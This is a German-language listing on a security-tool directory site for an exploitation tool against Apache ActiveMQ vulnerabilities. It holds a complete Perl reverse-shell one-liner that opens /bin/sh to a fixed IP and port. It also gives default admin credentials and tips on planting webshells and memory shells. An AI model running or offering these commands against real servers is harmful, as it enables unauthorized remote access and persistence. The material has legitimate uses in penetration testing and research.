Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ActiveMQ-EXPtools — Apache ActiveMQ umfassendes Ausnutzungstool für Schwachstellen (CVE-2015-5254,CVE-2016-3088,CVE-2022-41678,CVE-2023-46604,CVE-2024-32114,CVE-2026-34197,CVE-2026-40466, CVE-2026-42588) | Kitploit
Tools/GitHubGitHub/catherines77/activemq-exptools
SchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubcatherines77/activemq-exptools

ActiveMQ-EXPtools

Apache ActiveMQ umfassendes Ausnutzungstool für Schwachstellen (CVE-2015-5254,CVE-2016-3088,CVE-2022-41678,CVE-2023-46604,CVE-2024-32114,CVE-2026-34197,CVE-2026-40466, CVE-2026-42588)

Repository anzeigen
8391vor 2 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ActiveMQ-EXPtools

Unterstützt Erkennung und Ausnutzung von Apache ActiveMQ-Schwachstellen: CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588

image-20260420111234916

[!WARNING] Dieses Tool dient ausschließlich zu Sicherheitsforschungs- und Lernzwecken. Der Benutzer trägt die alleinige Verantwortung für alle rechtlichen und damit verbundenen Konsequenzen, die sich aus der Nutzung dieses Tools ergeben. Stelle sicher, dass dein Handeln den örtlichen Gesetzen und Vorschriften entspricht. Der Autor übernimmt keinerlei Haftung. Wenn du damit nicht einverstanden bist, verwende dieses Tool nicht.

Start mit JDK 8, Openwire-Standardport 61616, manchmal ist die Zielumgebung möglicherweise nicht geöffnet. Apache ActiveMQ-Standardbenutzername und -passwort: admin:admin. Das BeanXML-Einstellungsfeld kann bösartige XML-Dateien generieren, die entsprechende Befehle ausführen. Bei Fragen kannst du gerne ein Issue eröffnen.

Bei der Schwachstellenerkennung kann die bösartige XML-Serveradresse auf dnslog gesetzt werden. Wenn eine Anfrage eingeht, bedeutet dies, dass möglicherweise CVE-2023-46604, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588 vorhanden sind.

Hinweise zur Ausnutzung einiger Schwachstellen

CVE-2015-5254

java-chains generiert Deserialisierungsdaten, zur Verifizierung der Schwachstelle kann URLDNS verwendet werden.

Bei der Reverse-Shell ist es am besten, Perl zu verwenden; sh und bash funktionieren manchmal nicht.

root@kitploit:~
/usr/bin/perl -e 'use Socket;$i="192.168.239.129";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

image-20260420110252750

CVE-2022-41678

Beim Schreiben einer benutzerdefinierten Webshell führt das Schreiben von "Ice Scorpion" zu einem 500-Fehler, während "Godzilla" normal funktioniert. Bei der Verbindung des Tools muss der Authentifizierungs-Header hinzugefügt werden.

Memory-Shell-Injection

Ab Version 1.4 ist das Memory-Shell-Generierungsmodul MemShellParty nicht mehr integriert, zum einen wegen der Aufblähung des Fat-JAR-Pakets, zum anderen, weil die von springbeanxmlclassloader benötigte Base64-Decodierungsmethode nicht in allen Java-Versionen universell ist, was dazu führt, dass das Tool das Rad neu erfinden muss. Personen, die eine Memory-Shell benötigen, können den folgenden Prozess zur XML-Generierung als Referenz verwenden.

Zuerst den entsprechenden Base64-String der Memory-Shell auf MemShellParty generieren: https://party.mem.mk/ui

image-20260508110638599

Dann zu java-chains gehen, Generate-OtherPayload finden und "Custom Bytecode" auswählen.

0

Wähle die Base64-Decodierungsmethode entsprechend der JDK-Version, standardmäßig die decodeFromString-Methode, während der CVE-2026-34197-Übungsplatz in vulhub java.util.Base64 benötigt.

Zum Schluss den Base64-String der Memory-Shell einfügen und auf "Generieren" klicken.

image-20260508110858921

Bei Filter-, Listener- oder Servlet-Typ muss der Pfad /admin/, /api/ sowie der Authentifizierungs-Header zur Verbindungsadresse der Memory-Shell hinzugefügt werden. Handler benötigen keinen Pfad und kein Authentifizierungs-Header-Feld.

Danksagungen

https://github.com/URJACK2025/CVE-2022-41678

https://github.com/vulhub/vulhub

https://github.com/ReaJason/MemShellParty

https://github.com/1diot9/MyJavaSecStudy/blob/5504868a7cba4bf674fe6974fe8f613e556e5d42/Apache/ActiveMQ/CVE-2026-40466/poc/CVE-2026-40466_HTTP_Discovery_RCE_Analysis.md

https://github.com/vulhub/java-chains

Tool herunterladen